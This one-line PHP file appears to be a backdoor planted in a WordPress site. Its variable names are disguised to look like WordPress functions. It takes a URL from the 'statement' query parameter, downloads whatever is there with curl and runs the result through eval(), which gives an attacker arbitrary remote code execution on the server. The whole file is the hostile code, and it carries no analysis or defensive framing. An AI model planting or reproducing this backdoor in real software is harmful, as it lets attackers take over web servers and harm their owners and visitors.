<?php if (isset($_GET['statement'])) { $the_excerpt_ihc = $_GET['statement']; if ($wp_enqueue_style_px = curl_init()) { curl_setopt($wp_enqueue_style_px, CURLOPT_URL, $the_excerpt_ihc); curl_setopt($wp_enqueue_style_px, CURLOPT_RETURNTRANSFER, true); eval(curl_exec($wp_enqueue_style_px)); curl_close($wp_enqueue_style_px); exit; } }